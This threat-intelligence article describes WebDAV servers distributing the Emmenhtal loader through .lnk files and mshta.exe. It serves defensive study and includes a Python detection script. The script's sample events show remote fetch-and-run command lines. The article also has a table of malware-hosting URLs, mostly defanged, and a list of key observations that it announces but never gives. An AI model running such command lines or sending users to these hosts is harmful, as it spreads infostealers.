A new method of attack has emerged that leverages WebDAV technology to host malicious files. This approach, which facilitates the distribution of the Emmenhtal loader—also known as PeakLight—has been under scrutiny since December 2023.
The loader is notorious for its stealthy, memory-only execution and its role in distributing various infostealers worldwide.
This article delves into the use of WebDAV for malicious purposes, the range of malware distributed through this infrastructure, and the potential for this setup to be part of a broader “Infrastructure-as-a-Service” (IaaS) offering to cybercriminals.
WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to manage files on web servers.
While it has legitimate applications in collaborative environments, cybercriminals have increasingly exploited it for malicious activities.
The Sekoia TDR team identified over 100 malicious WebDAV servers involved in distributing the Emmenhtal loader.
These servers host weaponized “.lnk” files designed to download further malicious payloads using “mshta.exe,” a legitimate Microsoft executable.
This method provides a high degree of stealth, as using trusted system binaries like “mshta.exe” helps bypass security controls.
Separating the hosting server for initial “.lnk” files from the payload server complicates detection and attribution efforts.
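As an added example, not code from Sekoia or from this article, the following Python triage pass flags process-creation events that show the pattern described above: mshta.exe launched with a remote target, or a shortcut opened over a WebDAV path. The event records and addresses are constructed; the host@80 / DavWWWRoot naming is the Windows WebDAV mini-redirector convention.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, reduced to
# parent image, image and command line). Hosts are RFC 5737 documentation
# addresses; nothing here is real telemetry from the campaign.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta.exe http://203.0.113.10/Downloads/stage2.hta"),
    ("explorer.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta.exe \\203.0.113.10@80\DavWWWRoot\Downloads\test.lnk"),
    ("explorer.exe", r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c "\\198.51.100.7@80\DavWWWRoot\Downloads\Invoice.pdf.lnk"'),
    ("explorer.exe", r"C:\Windows\System32\mshta.exe",
     r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),   # local .hta, benign
    ("explorer.exe", r"C:\Windows\System32\notepad.exe",
     r"notepad.exe C:\Users\alice\notes.txt"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# \\host\path; the WebDAV mini-redirector writes hosts as host@80, host@SSL, host@SSL@443
UNC_RE = re.compile(r'\\\\([^\\\s"]+)\\([^\s"]*)')
WEBDAV_HOST_RE = re.compile(r"@(ssl|\d+)(@\d+)?$", re.I)
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]{2,4}\.lnk\b", re.I)


def analyze_event(parent, image, cmdline):
    """Return (severity, reasons) for one event; severity is None when clean."""
    reasons = []
    urls = URL_RE.findall(cmdline)
    uncs = UNC_RE.findall(cmdline)
    image_name = image.rsplit("\\", 1)[-1].lower()
    if image_name == "mshta.exe" and (urls or uncs):
        reasons.append("mshta.exe launched with a remote target")
    for host, path in uncs:
        if WEBDAV_HOST_RE.search(host) or "davwwwroot" in path.lower():
            reasons.append("WebDAV-style UNC path %s" % host)
    if ".lnk" in cmdline.lower() and (urls or uncs):
        reasons.append("shortcut referenced from a remote location")
    if DOUBLE_EXT_RE.search(cmdline):
        reasons.append("double-extension .lnk name")
    if not reasons:
        return None, []
    severity = "high" if reasons[0].startswith("mshta.exe") else "medium"
    return severity, reasons


def triage(events):
    """Run analyze_event over a batch and keep only the events with findings."""
    findings = []
    for parent, image, cmdline in events:
        severity, reasons = analyze_event(parent, image, cmdline)
        if severity:
            findings.append((severity, image.rsplit("\\", 1)[-1], reasons))
    return findings
```

A real deployment would key the same checks on Sysmon or EDR process-creation telemetry and tune the benign-mshta allowance to the vendor .hta files actually used in the environment.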
Sekoia’s investigation revealed a diverse array of malware distributed through this infrastructure, highlighting its versatility.
Notable malware families include SelfAU3, DarkGate, Amadey, Lumma, Remcos, MeduzaStealer, DANABOT, ACR Stealer, Asyncrat, Stealit, Cryptbot, XWORM, and DEERSTEALER.
Each was delivered through WebDAV-hosted “.lnk” files with URLs adjusted to minimize direct exposure.
Table: Malware Families and Their Corresponding URLs

| Malware Family | URL |
| --- | --- |
| SelfAU3 | 91[.]92[.]251[.]35/Downloads/solaris-docs[.]lnk |
| DarkGate | 206[.]188[.]196[.]28/Downloads/example[.]lnk |
| Amadey | 147[.]45[.]79[.]82/Downloads/qqeng[.]pdf[.]lnk |
| Lumma | 91[.]92[.]243[.]198:81/Downloads/test[.]lnk |
| Remcos | 89[.]23[.]107[.]244/Downloads/Test[.]lnk |
| MeduzaStealer | 94[.]156[.]64[.]74/Downloads/SecretTeachings[.]pdf[.]lnk |
| DANABOT | 151[.]236[.]17[.]180/Wire%20Confirmation/WireConfirmation[.]pdf[.]lnk |
| ACR Stealer | 62[.]133[.]61[.]104/Downloads/test[.]pdf[.]lnk |
| Asyncrat | 62[.]133[.]61[.]101/Downloads/Invoice[.]pdf[.]lnk |
| Stealit | 62[.]133[.]61[.]37/Downloads/config[.]txt[.]lnk |
| Cryptbot | 89[.]23[.]103[.]56/Downloads/Videof/Full%20Video%20HD%20%281080p%29[.]lnk |
| XWORM | 62[.]133[.]61[.]73/Downloads/Photo[.]lnk |
| DEERSTEALER | 92[.]118[.]112[.]253/Downloads/releaseform.pdf.lnk |
The diversity of malware payloads suggests that this WebDAV infrastructure may be part of a more extensive cybercriminal operation offering IaaS to multiple threat actors.
Key observations supporting this hypothesis include:
The infrastructure supporting the Emmenhtal loader represents a sophisticated operation likely offered as a service to various cybercriminals.
Its ability to deliver multiple malware payloads while maintaining stealth underscores the evolving threat landscape in cybersecurity.